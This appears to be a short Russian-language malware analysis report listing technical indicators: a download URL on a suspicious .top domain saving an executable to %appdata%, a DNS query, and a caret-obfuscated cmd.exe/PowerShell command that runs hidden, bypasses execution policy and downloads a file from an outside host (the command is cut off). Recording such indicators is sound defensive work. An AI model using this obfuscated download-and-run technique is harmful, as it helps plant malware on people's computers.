Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWEr^shE^ll^.^eXE^ -execUTi^ONpO^L^I^cY^ ^bY^PaSs -^no^pR^O^Fi^lE -Win^D^o^wST^Y^L^e hid^d^e^n ^(N^E^W-o^b^JECT^ s^ySt^e^m.Net.W^eB^ClieNT)^.D^oW^N^lO^a^d^fi^l^e('http://www...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "p^oWEr^shE^ll^.^eXE^ -execUTi^ONpO^L^I^cY^ ^bY^PaSs -^no^pR^O^Fi^lE -Win^D^o^wST^Y^L^e hid^d^e^n ^(N^E^W-o^b^JECT^ s^ySt^e^m.Net.W^eB^ClieNT)^.D^oW^N^lO^a^d^fi^l^e('http://www...' (со скрытым окном)